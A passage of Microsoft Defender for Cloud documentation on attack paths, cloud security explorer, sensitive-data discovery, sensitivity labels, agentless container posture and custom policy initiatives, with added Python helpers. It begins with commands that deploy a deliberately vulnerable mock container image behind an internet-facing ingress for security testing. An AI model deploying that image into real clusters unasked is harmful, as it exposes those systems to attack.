   helm install dcspmcharts oci://dcspmtesting.azurecr.io/dcspmcharts --version 1.0.0 --namespace mdc-dcspm-demo --create-namespace --set registry=<your-registry>

Note

After completing the above flow, it can take up to 24 hours to see results in the
cloud security explorer and attack path.
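The steps above are usually run by hand in Cloud Shell. The following added example (not Microsoft's code and not part of Defender for Cloud) scripts them: it assembles the az and helm command lines from steps 1, 2 and 4 in execution order, and then applies the step 3 success conditions (deployment "pod" at 3/3, the ingress-nginx controller at 1/1, exactly one ingress with an IP address and nginx class) to the JSON that kubectl returns for the mdc-dcspm-demo namespace. The ACR, AKS cluster, resource group, subscription and registry values are placeholders supplied by the caller, the check runs after the helm install rather than before it, and the kubectl output embedded at the bottom is constructed for the example, not captured from a real cluster.

```python
"""Run the mock vulnerable image test (steps 1, 2 and 4 above) and check the
step 3 success conditions from kubectl's JSON output.  Example code added to
this page; it is not part of Defender for Cloud.  The ACR, AKS cluster,
resource group, subscription and registry values are caller-supplied placeholders."""
import json
import subprocess

MOCK_IMAGE = "mdc-mock-0001"
MOCK_SOURCE = "DCSPMtesting.azurecr.io/" + MOCK_IMAGE
DEMO_NAMESPACE = "mdc-dcspm-demo"
CHART = "oci://dcspmtesting.azurecr.io/dcspmcharts"
# Deployment name -> ready replica count that step 3 tells you to expect.
EXPECTED_DEPLOYMENTS = {"pod": 3, "dcspmcharts-ingress-nginx-controller": 1}


def setup_commands(acr, aks, resource_group, subscription, registry):
    """The az/helm command lines from the steps above, in execution order, as argv lists."""
    return [
        ["az", "acr", "import", "--name", acr, "--source", MOCK_SOURCE, "--image", MOCK_IMAGE],
        ["az", "aks", "update", "-n", aks, "-g", resource_group, "--attach-acr", acr],
        ["az", "aks", "get-credentials", "--subscription", subscription,
         "--resource-group", resource_group, "--name", aks],
        ["helm", "install", "dcspmcharts", CHART, "--version", "1.0.0",
         "--namespace", DEMO_NAMESPACE, "--create-namespace", "--set", "registry=" + registry],
    ]


def run_setup(commands, dry_run=True):
    """Print each command; execute it only when dry_run is False."""
    for argv in commands:
        print("+", " ".join(argv))
        if not dry_run:
            subprocess.run(argv, check=True)


def check_demo_namespace(deployments_json, ingresses_json):
    """Apply the step 3 success conditions to the output of
    `kubectl get deploy -n mdc-dcspm-demo -o json` and
    `kubectl get ingress -n mdc-dcspm-demo -o json`.
    Returns a list of problems; an empty list means the mock deployment is up."""
    problems = []
    deploys = {d["metadata"]["name"]: d for d in json.loads(deployments_json)["items"]}
    for name, want in EXPECTED_DEPLOYMENTS.items():
        dep = deploys.get(name)
        if dep is None:
            problems.append(f"deployment {name} not found")
            continue
        ready = dep.get("status", {}).get("readyReplicas", 0)
        if ready != want:
            problems.append(f"deployment {name}: {ready}/{want} ready")
    ingresses = json.loads(ingresses_json)["items"]
    if len(ingresses) != 1:
        problems.append(f"expected 1 ingress, found {len(ingresses)}")
        return problems
    ing = ingresses[0]
    lb_entries = ing.get("status", {}).get("loadBalancer", {}).get("ingress", [])
    if not any(e.get("ip") for e in lb_entries):
        problems.append("ingress has no IP address yet")
    # The ingress class may be set via spec.ingressClassName or the legacy annotation.
    klass = (ing.get("spec", {}).get("ingressClassName")
             or ing.get("metadata", {}).get("annotations", {}).get("kubernetes.io/ingress.class"))
    if klass != "nginx":
        problems.append(f"ingress class is {klass!r}, expected 'nginx'")
    return problems


def kubectl_json(kind):
    """Fetch live objects from the demo namespace (needs kubectl and cluster credentials)."""
    return subprocess.run(["kubectl", "get", kind, "-n", DEMO_NAMESPACE, "-o", "json"],
                          check=True, capture_output=True, text=True).stdout


# Constructed kubectl output for a healthy deployment (not captured from a real cluster).
SAMPLE_DEPLOYMENTS = json.dumps({"items": [
    {"metadata": {"name": "pod"}, "status": {"replicas": 3, "readyReplicas": 3}},
    {"metadata": {"name": "dcspmcharts-ingress-nginx-controller"},
     "status": {"replicas": 1, "readyReplicas": 1}}]})
SAMPLE_INGRESSES = json.dumps({"items": [
    {"metadata": {"name": "dcspmcharts-ingress"}, "spec": {"ingressClassName": "nginx"},
     "status": {"loadBalancer": {"ingress": [{"ip": "203.0.113.10"}]}}}]})

if __name__ == "__main__":
    run_setup(setup_commands("<acr-name>", "<your-cluster-name>", "<your-rg>",
                             "<cluster-suid>", "<your-registry>"), dry_run=True)
    print("sample check:", check_demo_namespace(SAMPLE_DEPLOYMENTS, SAMPLE_INGRESSES) or "OK")
```

To check a live cluster, pass `kubectl_json("deploy")` and `kubectl_json("ingress")` to `check_demo_namespace` a few minutes after the helm install; the load balancer IP is the condition that typically takes longest to appear.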


Investigate internet exposed Kubernetes pods 


You can build queries in one of the following ways:

- Find the security issue under attack paths
- Explore risks with built-in cloud security explorer templates
- Create custom queries with cloud security explorer


Find the security issue under attack paths

1. Go to Recommendations in the Defender for Cloud menu.
2. Select the Attack Path link to open the attack paths view.
3. Locate the entry that details this security issue under "Internet exposed Kubernetes
   pod is running a container with high severity vulnerabilities."




Explore risks with cloud security explorer templates 


1. From the Defender for Cloud overview page, open the cloud security explorer. 


2. Some out-of-the-box templates for Kubernetes appear. Select one of the templates:

   - Azure Kubernetes pods running images with high severity vulnerabilities
   - Kubernetes namespaces contain vulnerable pods




3. Select Open query; the template builds the query in the upper portion of the
   screen. Select Search to view the results.




Create custom queries with cloud security explorer 




You can also create your own custom queries. The following example shows a search for
pods running container images that are vulnerable to remote code execution.




The results are listed below the query. 




Next steps 




- Learn more about the Defender for Cloud Defender plans.




Enable data-aware security posture

This article describes how to enable data-aware security posture in Microsoft Defender
for Cloud.


Before you start 


Before you enable data-aware security posture, review support and prerequisites. 
When you enable Defender CSPM or Defender for Storage plans, the sensitive data 
discovery extension is automatically enabled. You can disable this setting if you 
don't want to use data-aware security posture, but we recommend that you use 
the feature to get the most value from Defender for Cloud. 

Sensitive data is identified based on the data sensitivity settings in Defender for 
Cloud. You can customize the data sensitivity settings to identify the data that your 
organization considers sensitive. 

It takes up to 24 hours to see the results of a first discovery after enabling the 
feature. 


Enable in Defender CSPM (Azure)

Follow these steps to enable data-aware security posture. Don't forget to review
required permissions before you start.

1. Navigate to Microsoft Defender for Cloud > Environmental settings.
2. Select the relevant Azure subscription.
3. For the Defender CSPM plan, select the On status.

   If Defender CSPM is already on, select Settings in the Monitoring coverage column
   of the Defender CSPM plan and make sure that the Sensitive data discovery
   component is set to On status.

4. Once sensitive data discovery is turned On in Defender CSPM, it will automatically
   incorporate support for additional resource types as the range of supported
   resource types expands.


Enable in Defender CSPM (AWS) 


Before you start 


- Don't forget to review the requirements for AWS discovery and the required
  permissions.
- Check that there's no policy that blocks the connection to your Amazon S3
  buckets.
- For RDS instances: cross-account KMS encryption is supported, but additional
  policies on KMS access may prevent access.


Enable for AWS resources 


S3 buckets and RDS instances 


1. Enable data security posture as described above 
2. Proceed with the instructions to download the CloudFormation template and to 
run it in AWS. 


Automatic discovery of S3 buckets in the AWS account starts automatically. 


For S3 buckets, the Defender for Cloud scanner runs in your AWS account and connects 
to your S3 buckets. 


For RDS instances, discovery will be triggered once Sensitive Data Discovery is turned 
on. The scanner will take the latest automated snapshot for an instance, create a manual 
snapshot within the source account, and copy it to an isolated Microsoft-owned 
environment within the same region. 


The snapshot is used to create a live instance that is spun up, scanned and then 
immediately destroyed (together with the copied snapshot). 


Only scan findings are reported by the scanning platform. 


[Diagram: AWS customer account (automatic snapshots -> manual snapshots) -> manual snapshot copy -> isolated regional MDC scanning environment (AWS) with the scanning platform -> Defender for Cloud portal]


Check for S3 blocking policies 
If the enable process didn't work because of a blocked policy, check the following: 


- Make sure that the S3 bucket policy doesn't block the connection. In the AWS S3
  bucket, select the Permissions tab > Bucket policy. Check the policy details to
  make sure the Microsoft Defender for Cloud scanner service running in the
  Microsoft account in AWS isn't blocked.
- Make sure that there's no SCP policy that blocks the connection to the S3 bucket.
  For example, your SCP policy might block read API calls to the AWS Region where
  your S3 bucket is hosted.
- Check that these required API calls are allowed by your SCP policy: AssumeRole,
  GetBucketLocation, GetObject, ListBucket, GetBucketPublicAccessBlock.
- Check that your SCP policy allows calls to the us-east-1 AWS Region, which is the
  default region for API calls.
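Reading a large SCP by eye for the four conditions above is error-prone. The following added example (not Microsoft's or AWS's code) automates the check: given a policy document, it reports every required action (the five API calls listed above) that a Deny statement covers when the call is made in a given region, evaluating `aws:RequestedRegion` conditions so that a region-locked Deny is caught for us-east-1 and for the bucket's own region. The policy embedded in the block is constructed for the demonstration; Principal and Resource elements are deliberately not narrowed, so any matching Deny is reported, which is the conservative reading when you are deciding whether the scanner could be blocked.

```python
"""Check an AWS Service Control Policy (SCP) or S3 bucket policy for Deny statements
that would block the API calls the Defender for Cloud S3 scanner needs.
Example code added to this page, not part of Defender for Cloud or the AWS SDK;
the sample policy is constructed for the demonstration and the required actions
and default region come from the list above."""
import json
from fnmatch import fnmatch

REQUIRED_ACTIONS = ["sts:AssumeRole", "s3:GetBucketLocation", "s3:GetObject",
                    "s3:ListBucket", "s3:GetBucketPublicAccessBlock"]
DEFAULT_REGION = "us-east-1"   # default region for API calls, per the text above

# Constructed SCP: allows everything, then denies S3 outside eu-west-1 and denies
# GetBucketPublicAccessBlock everywhere.  Not a real organization's policy.
SAMPLE_SCP = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AllowAll", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "DenyS3OutsideEU", "Effect": "Deny", "Action": "s3:*", "Resource": "*",
     "Condition": {"StringNotEquals": {"aws:RequestedRegion": ["eu-west-1"]}}},
    {"Sid": "DenyPublicAccessBlockRead", "Effect": "Deny",
     "Action": ["s3:GetBucketPublicAccessBlock"], "Resource": "*"}
  ]}""")


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(patterns, value):
    """IAM action and region matching is case-insensitive and supports * and ? wildcards."""
    return any(fnmatch(value.lower(), p.lower()) for p in patterns)


def _region_condition_applies(condition, region):
    """Evaluate only aws:RequestedRegion conditions; any other condition is treated as
    satisfied, so the check errs on the side of reporting a possible block."""
    for operator, pairs in condition.items():
        regions = _as_list(pairs.get("aws:RequestedRegion"))
        if not regions:
            continue
        hit = _matches(regions, region)
        op = operator.lower()
        if op.startswith("stringequals") or op.startswith("stringlike"):
            if not hit:
                return False
        elif op.startswith("stringnotequals") or op.startswith("stringnotlike"):
            if hit:
                return False
    return True


def statement_denies(stmt, action, region):
    """True if a Deny statement covers `action` when the call is made in `region`."""
    if stmt.get("Effect") != "Deny":
        return False
    if "Action" in stmt:
        if not _matches(_as_list(stmt["Action"]), action):
            return False
    elif "NotAction" in stmt:
        if _matches(_as_list(stmt["NotAction"]), action):
            return False
    # Principal and Resource are not narrowed: a Deny covering the action for anyone or
    # any resource is reported, which is the conservative reading for this check.
    return _region_condition_applies(stmt.get("Condition", {}), region)


def find_blocking_statements(policy, region=DEFAULT_REGION, actions=REQUIRED_ACTIONS):
    """Map each required action that some Deny statement blocks in `region` to the
    Sids (or positions) of the statements responsible."""
    blocked = {}
    for index, stmt in enumerate(_as_list(policy.get("Statement"))):
        sid = stmt.get("Sid", f"Statement[{index}]")
        for action in actions:
            if statement_denies(stmt, action, region):
                blocked.setdefault(action, []).append(sid)
    return blocked


if __name__ == "__main__":
    for region in (DEFAULT_REGION, "eu-west-1"):
        print(region, "->", find_blocking_statements(SAMPLE_SCP, region))
```

Run it once with the default region and once with the region where the bucket lives; an empty result for both is what you want before enabling discovery. A non-empty result names the Sid to look at, which is faster than hunting through the policy after the enable step has already failed.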


Enable data-aware monitoring in Defender for 
Storage 


Sensitive data threat detection is enabled by default when the sensitive data discovery
component is enabled in the Defender for Storage plan. Learn more.


Only Azure Storage resources will be scanned if the Defender CSPM plan is turned off. 


Next steps 


Review the security risks in your data 


Explore risks to sensitive data 
After you discover resources with sensitive data, Microsoft Defender for Cloud lets you
explore sensitive data risk for those resources with these features:


- Attack paths: When sensitive data discovery is enabled in the Defender Cloud
  Security Posture Management (CSPM) plan, you can use attack paths to discover
  the risk of data breaches. Learn more.
- Security Explorer: When sensitive data discovery is enabled in the Defender CSPM
  plan, you can use Cloud Security Explorer to find sensitive data insights. Learn
  more.
- Security alerts: When sensitive data discovery is enabled in the Defender for
  Storage plan, you can prioritize and explore ongoing threats to sensitive data
  stores by applying sensitivity filters in the Security Alerts settings.


Explore risks through attack paths 


View predefined attack paths to discover data breach risks, and get remediation
recommendations, as follows:


1. In Defender for Cloud, open Recommendations > Attack paths. 


2. In Risk category filter, select Data exposure or Sensitive data exposure to filter 
the data-related attack paths. 




3. Review the data attack paths. 


4. To view sensitive information detected in data resources, select the resource name 
> Insights. Then, expand the Contain sensitive data insight. 


5. For risk mitigation steps, open Active Recommendations. 
Other examples of attack paths for sensitive data include:

- "Internet exposed Azure Storage container with sensitive data is publicly accessible"
- "Managed database with excessive internet exposure and sensitive data allows basic (local user/password) authentication"
- "VM has high severity vulnerabilities and read permission to a data store with sensitive data"
- "Internet exposed AWS S3 Bucket with sensitive data is publicly accessible"
- "Private AWS S3 bucket that replicates data to the internet is exposed and publicly accessible"
- "RDS snapshot is publicly available to all AWS accounts"


Review a full list of attack paths. 


Explore risks with Cloud Security Explorer 


Explore data risks and exposure in cloud security graph insights using a query template, 
or by defining a manual query. 


1. In Defender for Cloud, open Cloud Security Explorer. 


2. You can build your own query, or select one of the sensitive data query templates 
> Open query, and modify it as needed. Here's an example: 




Use query templates 


As an alternative to creating your own query, you can use predefined query templates. A 
number of sensitive data query templates are available. For example: 


- Internet exposed storage containers with sensitive data that allow public access
- Internet exposed S3 buckets with sensitive data that allow public access


When you open a predefined query it's populated automatically and can be tweaked as 
needed. For example, here are the prepopulated fields for "Internet exposed storage 
containers with sensitive data that allow public access". 


[Screenshot: the prepopulated query "Azure Blob storage containers" that "Contains sensitive data" that "Allows public access" that "Contained in" "Object storage (group)" that "Exposed to the internet", scope: All]


Explore sensitive data security alerts 


When sensitive data discovery is enabled in the Defender for Storage plan, you can 
prioritize and focus on the alerts that affect resources with sensitive data. Learn 
more about monitoring data security alerts in Defender for Storage. 


For PaaS databases and S3 Buckets, findings are reported to Azure Resource Graph 
(ARG) allowing you to filter and sort by sensitivity labels and sensitive info types in 
Defender for Cloud Inventory, Alert and Recommendation blades. 


Export findings 


It's common for the security administrator, who reviews sensitive data findings in attack 
paths or the security explorer, to lack direct access to the data stores. Therefore, they'll 
need to share the findings with the data owners, who can then conduct further 
investigation. 


For that purpose, use the Export within the Contains sensitive data insight. 


[Screenshot: the "Contains sensitive data (Preview)" insight for SQL server ContosoSQLSrv (subscription ContosoSec, resource group ContosoRG, cloud provider Azure). Last scan time (UTC): 7/17/2023, 10:03:42 PM. Sensitivity label: No sensitivity label. Sensitive info types: Credit Card Number (4 columns), EU Debit Card Number, Canada Social Insurance Number (1 column). Column samples: CardNumber (financedb1.mainSchema.Payment), contained in financedb1.mainSchema.Payment.CardNumber, with info types EU Debit Card Number and Credit Card Number; CardNumber (financedb2.mainSchema.Payment); CardNumber (financedb2.BackupSchema.CCRef).]


The CSV file produced will include: 


• Sample name - depending on the resource type, this can be a database column, file name, or container name. 
• Sensitivity label - the highest ranking label found on this resource (same value for all rows). 
• Contained in - sample full path (file path or column full name). 
• Sensitive info types - discovered info types per sample. If more than one info type was detected, a new row will be added for each info type. This is to allow an easier filtering experience. 


O Note 


Download CSV report in the Cloud Security Explorer page will export all insights 
retrieved by the query in raw format (json). 
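Because the export carries one row per detected info type, a data owner usually wants the rows collapsed back to one entry per column or file, and the administrator wants to hand each owner only the findings for stores they control. The following is an added example (not code from the Defender for Cloud documentation or product) that does both on a constructed sample of the CSV format described above; the column headers and the database-name-to-owner mapping are assumptions. 

```python
import csv
import io
from collections import defaultdict

# Constructed sample of the export format described above: one row per
# detected info type, with the Sensitivity label repeated on every row.
# Column headers are assumed from the field descriptions, not copied
# from a real export.
SAMPLE_EXPORT = """\
Sample name,Sensitivity label,Contained in,Sensitive info types
CardNumber,No sensitivity label,financedb1.mainSchema.Payment.CardNumber,Credit Card Number
CardNumber,No sensitivity label,financedb1.mainSchema.Payment.CardNumber,EU Debit Card Number
CardNumber,No sensitivity label,financedb2.mainSchema.Payment.CardNumber,Credit Card Number
SIN,No sensitivity label,financedb2.BackupSchema.CCRef.SIN,Canada Social Insurance Number
"""


def group_findings(csv_text):
    """Collapse the one-row-per-info-type export into one entry per
    sample path ("Contained in"), listing every info type found there."""
    reader = csv.DictReader(io.StringIO(csv_text))
    findings = defaultdict(lambda: {"sample": None, "label": None, "info_types": []})
    for row in reader:
        entry = findings[row["Contained in"]]
        entry["sample"] = row["Sample name"]
        entry["label"] = row["Sensitivity label"]
        entry["info_types"].append(row["Sensitive info types"])
    return dict(findings)


def by_owner(findings, owner_map):
    """Route each grouped finding to the owner of the database that holds
    it, so only the relevant rows are shared. owner_map (an assumed
    lookup) maps the first path component, the database name, to an
    owner contact; databases with no owner fall under 'unassigned'."""
    out = defaultdict(list)
    for path, entry in findings.items():
        db = path.split(".", 1)[0]
        out[owner_map.get(db, "unassigned")].append({"path": path, **entry})
    return dict(out)


if __name__ == "__main__":
    grouped = group_findings(SAMPLE_EXPORT)
    for owner, rows in by_owner(grouped, {"financedb1": "finance-dba@example.com"}).items():
        print(owner)
        for r in rows:
            print("  ", r["path"], "->", ", ".join(r["info_types"]))
```

Run it against a real export by reading the downloaded file into `group_findings`; the owner map is the one piece of organisational knowledge the export cannot supply. 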


Next steps 


• Learn more about attack paths. 
• Learn more about Cloud Security Explorer. 


Customize data sensitivity settings 
This article describes how to customize data sensitivity settings in Microsoft Defender 
for Cloud. 


Data sensitivity settings are used to identify and focus on managing the critical sensitive 
data in your organization. The settings cover: 


• The sensitive info types and sensitivity labels that come from Microsoft Purview compliance portal and which you can select in Defender for Cloud. By default, Defender for Cloud uses the built-in sensitive information types provided by Microsoft Purview compliance portal. Some of the info types and labels are enabled by default, and you can modify them as needed. 

• You can optionally allow the import of custom sensitive info types and of sensitivity labels that you've defined in Microsoft Purview. 

• If you import labels, you can set a sensitivity threshold that determines the minimum sensitivity level for a label to be marked as sensitive in Defender for Cloud. 


This configuration helps you focus on your critical sensitive resources and improve the 
accuracy of the sensitivity insights. 


Before you start 


• Make sure that you review the prerequisites and requirements for customizing data sensitivity settings. 

• In Defender for Cloud, enable sensitive data discovery capabilities in the Defender CSPM and/or Defender for Storage plans. 


Changes in sensitivity settings take effect the next time that resources are discovered. 


Import custom sensitive info types/labels 


Defender for Cloud uses built-in sensitive info types. You can optionally import your 
own custom sensitive info types and labels from Microsoft Purview compliance portal to 
align with your organization's needs. 


Import as follows (Import only once): 


1. Log into Microsoft Purview compliance portal. 

2. Navigate to Information Protection > Labels. 

3. In the consent notice message, select Turn on and then select Yes to share your custom info types and sensitivity labels with Defender for Cloud. 


Note 

• Imported labels appear in Defender for Cloud in the order rank that's set in Microsoft Purview. 
• The two sensitivity labels that are set to highest priority in Microsoft Purview are turned on by default in Defender for Cloud. 


Customize sensitive data categories/types 


To customize data sensitivity settings that appear in Defender for Cloud, review the 
prerequisites, and then do the following. 


1. Sign in to the Azure portal. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 

3. Select Data sensitivity. 

4. Select the info type category that you want to customize: 

   • The Finance, PII, and Credentials categories contain the default info type data that are typically sought out by attackers. 

   • The Custom category contains custom info types from your Microsoft Purview compliance portal configuration. 

   • The Other category contains all of the rest of the built-in available info types. 

5. Select the info types that you want to be marked as sensitive. 

6. Select Apply and Save. 


[Screenshot: the Data sensitivity page under Environment settings. It manages data sensitivity settings of cloud resources at the tenant level, based on selected info types and labels from the Microsoft Purview portal, and lists the categories Finance (4/5 selected), PII (6/45 selected), Credentials (3/3 selected), Custom (1/4 selected) and Other (5/132 selected). The "Select finance info types" pane shows ABA Routing Number, EU debit card number, International banking account number (IBAN) and SWIFT code.]


Set the threshold for sensitive data labels 


You can set a threshold to determine the minimum sensitivity level for a label to be 
marked as sensitive in Defender for Cloud. 


If you're using Microsoft Purview sensitivity labels, make sure that: 


• the label scope is set to "Items", under which you should configure auto labeling for files and emails 

• the labels are published with a label policy that is in effect. 

1. Sign in to the Azure portal. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 

3. Select Data sensitivity. The current minimum sensitivity threshold is shown. 

4. Select Change to see the list of sensitivity labels and select the lowest sensitivity label that you want marked as sensitive. 

5. Select Apply and Save. 


[Screenshot: the Data sensitivity page with the "Sensitivity label threshold" pane open. The pane explains that any labels at or above the selected threshold are considered sensitive and that the labels shown have automatic labelling rules assigned to them; it lists Highly Confidential, Confidential, General, Public and Non-Business. The page shows "Minimum sensitivity threshold: Confidential" with a Change link, and Apply/Cancel buttons.]


Note 

• When you turn on the threshold, you select the label with the lowest setting that should be considered sensitive in your organization. 

• Any resources with this minimum label or higher are presumed to contain sensitive data. 

• For example, if you select Confidential as minimum, then Highly Confidential is also considered sensitive. General, Public, and Non-Business aren't. 

• You can't select a sub label in the threshold. However, you can see the sublabel as the affected label on resources in attack path/Cloud Security Explorer, if the parent label is part of the threshold (part of the sensitive labels selected). 

• The same settings will apply to any supported resource (object storage and databases). 
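The threshold rule above is easy to misread when sublabels are involved, so here is the evaluation written out as an added example (not code from Defender for Cloud or the documentation). The label ranking is the one named on this page, highest first, but the real order rank comes from your Microsoft Purview configuration; the "Parent/Sublabel" notation for sublabels is an assumption made for the example. 

```python
# Label ranking as named on this page, highest first. In practice the order
# rank is whatever is configured in Microsoft Purview; this list is an
# assumed example configuration, not a product default.
LABEL_ORDER = ["Highly Confidential", "Confidential", "General", "Public", "Non-Business"]


def labels_at_or_above(threshold, order=LABEL_ORDER):
    """Parent labels the threshold marks as sensitive: the threshold label
    itself and every label ranked above it."""
    if threshold not in order:
        raise ValueError(f"unknown label: {threshold!r}")
    return set(order[: order.index(threshold) + 1])


def parent_label(label):
    """Sublabels are written here as 'Parent/Sublabel' (assumed notation).
    The threshold can only name a parent, so evaluate against the parent."""
    return label.split("/", 1)[0]


def is_sensitive(resource_label, threshold, order=LABEL_ORDER):
    """True when the resource's label, or its parent for a sublabel, is at
    or above the configured minimum threshold. Unlabelled resources are
    not presumed sensitive by the label rule (info types are separate)."""
    if resource_label is None:
        return False
    return parent_label(resource_label) in labels_at_or_above(threshold, order)


def triage(resources, threshold, order=LABEL_ORDER):
    """Split (resource_id, label) pairs into those presumed to contain
    sensitive data and those that are not, under the threshold rule."""
    sensitive, other = [], []
    for rid, label in resources:
        (sensitive if is_sensitive(label, threshold, order) else other).append(rid)
    return sensitive, other


if __name__ == "__main__":
    # Constructed inventory: a sublabelled storage account, a Public
    # database and an unlabelled one.
    inventory = [("stg-finance", "Confidential/Finance"), ("db-web", "Public"), ("db-legacy", None)]
    print(triage(inventory, "Confidential"))
```

Note what the rule does not do: lowering the threshold to General would pull every General-labelled resource into attack paths and explorer results, which is usually more noise than signal; the page's advice to pick the lowest label that is genuinely sensitive in your organization is what keeps the insight accurate. 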


Next steps 


Review risks to sensitive data 


Onboard agentless container posture in 
Defender CSPM 
Onboarding agentless container posture in Defender CSPM will allow you to gain all its 
capabilities. 


Defender CSPM includes two extensions that allow for agentless visibility into 
Kubernetes and containers registries across your organization's software development 
lifecycle. 


To onboard agentless container posture in Defender CSPM: 

1. Before starting, verify that the subscription is onboarded to Defender CSPM. 

2. In the Azure portal, navigate to the Defender for Cloud's Environment Settings page. 

3. Select the subscription that's onboarded to the Defender CSPM plan, then select Settings. 

4. Ensure the Agentless discovery for Kubernetes and Container registries vulnerability assessments extensions are toggled to On. 

5. Select Continue. 

[Screenshot: the Settings & monitoring page for a Defender CSPM subscription, opened from Environment settings > Settings | Defender plan] 

6. Select Save. 


A notification message pops up in the top right corner that will verify that the settings 
were saved successfully. 


What are the extensions for agentless container 
posture management? 


There are two extensions that provide agentless CSPM functionality: 


• Container registries vulnerability assessments: Provides agentless container registries vulnerability assessments. Recommendations are available based on the vulnerability assessment timeline. Learn more about image scanning. 

• Agentless discovery for Kubernetes: Provides API-based discovery of information about Kubernetes cluster architecture, workload objects, and setup. 


How can I onboard multiple subscriptions at 
once? 


To onboard multiple subscriptions at once, you can use this script. 


Why don't | see results from my clusters? 


If you don't see results from your clusters, check the following: 


• Do you have stopped clusters? 
• Are your resource groups, subscriptions, or clusters locked? 


What can | do if | have stopped clusters? 


Stopped clusters aren't supported or charged. To get the value of agentless capabilities 
on a stopped cluster, start the cluster again. 


What do | do if | have locked resource groups, 
subscriptions, or clusters? 


We suggest that you unlock the locked resource group/subscription/cluster, make the 
relevant requests manually, and then re-lock the resource group/subscription/cluster by 
doing the following: 


1. Enable the feature flag manually via CLI by using Trusted Access. 


CLI 


az feature register --namespace "Microsoft.ContainerService" --name "TrustedAccessPreview"


2. Perform the bind operation in the CLI: 


CLI 


az account set -s <SubscriptionId>
az extension add --name aks-preview

az aks trustedaccess rolebinding create \
  --resource-group <cluster resource group> \
  --cluster-name <cluster name> \
  --name defender-cloudposture \
  --source-resource-id /subscriptions/<SubscriptionId>/providers/Microsoft.Security/pricings/CloudPosture/securityOperators/DefenderCSPMSecurityOperator \
  --roles "Microsoft.Security/pricings/microsoft-defender-operator"


For locked clusters, you can also do one of the following: 


• Remove the lock. 
• Perform the bind operation manually by making an API request. 


Learn more about locked resources. 


Are you using an updated version of AKS? 


Learn more about supported Kubernetes versions in Azure Kubernetes Service (AKS). 


Next Steps 


• Learn more about Trusted Access. 

• Learn how to view and remediate vulnerability assessment findings for registry images. 

• Learn how to view and remediate vulnerabilities for images running on your AKS clusters. 

• Learn how to test the Attack Path and Security Explorer using a vulnerable container image. 

• Learn how to create an exemption for a resource or subscription. 

• Learn more about Cloud Security Posture Management. 


Create custom Azure security initiatives 
and policies 
To help secure your systems and environment, Microsoft Defender for Cloud generates 
security recommendations. These recommendations are based on industry best 
practices, which are incorporated into the generic, default security policy supplied to all 
customers. They can also come from Defender for Cloud's knowledge of industry and 
regulatory standards. 


With this feature, you can add your own custom initiatives. Although custom initiatives 
aren't included in the secure score, you'll receive recommendations if your environment 
doesn't follow the policies you create. Any custom initiatives you create are shown in the 
list of all recommendations and you can filter by initiative to see the recommendations 
for your initiative. They're also shown with the built-in initiatives in the regulatory 
compliance dashboard, as described in the tutorial Improve your regulatory compliance. 


As discussed in the Azure Policy documentation, when you specify a location for your 
custom initiative, it must be a management group or a subscription. 


Tip 

For an overview of the key concepts on this page, see What are security policies, 
initiatives, and recommendations?. 


You can view your custom initiatives organized by controls, similar to the controls in the 
compliance standard. To learn how to create policy groups within the custom initiatives 
and organize them in your initiative, follow the guidance provided in the policy 
definitions groups. 


To add a custom initiative to your subscription 


1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription or management group to which you would like to 
add a custom initiative. 


Note 


For your custom initiatives to be evaluated and displayed in Defender for 
Cloud, you must add them at the subscription level (or higher). We 
recommend that you select the widest scope available. 


3. Open the Security policy page, and in the Your custom initiatives area, select Add 
a custom initiative. 


[Screenshot: Settings | Security policy. The page lists the initiatives enabled on this subscription (the Default initiative, with no other policy assignments), the Industry & regulatory standards shown in the Regulatory compliance dashboard (Microsoft cloud security benchmark, PCI DSS 3.2.1, ISO 27001 and SOC TSP, each out of the box, plus an "Add more standards" link), and the "Your custom initiatives" area, which notes that custom initiatives generate custom recommendations in the Recommendations page and offers "Add a custom initiative".]


4. Review the list of custom policies already created in your organization, and select Add to assign a policy to your subscription. 


If there isn't an initiative in the list that meets your needs, you can create one. To create a new custom initiative: 

1. Select Create new. 

2. Enter the definition's location and custom name. 


Note 

Custom initiatives shouldn't have the same name as other initiatives (custom or built-in). If you create a custom initiative with the same name, it will cause a conflict in the information displayed in the dashboard. 


3. Select the policies to include and select Add. 
4. Enter any desired parameters. 
5. Select Save. 

6. In the Add custom initiatives page, select refresh. Your new initiative will be available. 

7. Select Add and assign it to your subscription. 


[Screenshot: the Add custom initiatives page. It explains that to add an existing initiative you click Add in the relevant row; that after adding the policy initiative it is listed as a recommendation in the Recommendations blade and added to the Regulatory compliance dashboard; and that if the initiative is not already assigned on this subscription you must assign it after clicking Add. The list shows one row, "Organizational policy" (description: custom policy; status: Not assigned).]


Note 

Creating new initiatives requires subscription owner credentials. For more information about Azure roles, see Permissions in Microsoft Defender for Cloud. 


Your new initiative takes effect and you can see the results in the following two ways: 

• From the Defender for Cloud menu, select Regulatory compliance. The compliance dashboard opens to show your new custom initiative alongside the built-in initiatives. 

• You'll begin to receive recommendations if your environment doesn't follow the policies you've defined. 


8. To see the resulting recommendations for your policy, select Recommendations 
from the sidebar to open the recommendations page. The recommendations will 
appear with a "Custom" label and be available within approximately one hour. 


[Screenshot: the Recommendations list showing custom recommendations such as "[Preview]: Show audit results from Windows VMs that do not have a minimum password age of 1 day", "[Preview]: Show audit results from Windows VMs that do not have a maximum password age of 70 days", "[Preview]: Show audit results from Windows VMs that allow re-use of the previous 24 passwords" and "[Preview]: Show audit results from Windows VMs on which the Log Analytics agent is not connected as expected"]


Enhance your custom recommendations with 
detailed information 


The built-in recommendations supplied with Microsoft Defender for Cloud include 
details such as severity levels and remediation instructions. If you want to add this type 
of information to your custom recommendations so that it appears in the Azure portal 
or wherever you access your recommendations, you'll need to use the REST API. 


The two types of information you can add are: 


• RemediationDescription - String 
• Severity - Enum [Low, Medium, High] 


The metadata should be added to the policy definition for a policy that is part of the 
custom initiative. It should be in the 'securityCenter' property, as shown: 


JSON 


"metadata": {
  "securityCenter": {
    "RemediationDescription": "Custom description goes here",
    "Severity": "High"
  }
}


Here's another example of a custom policy including the metadata/securityCenter 
property: 


JSON 


{
  "properties": {
    "displayName": "Security - ERvNet - AuditRGLock",
    "policyType": "Custom",
    "mode": "All",
    "description": "Audit required resource groups lock",
    "metadata": {
      "securityCenter": {
        "RemediationDescription": "Resource Group locks can be set via Azure Portal -> Resource Group -> Locks",
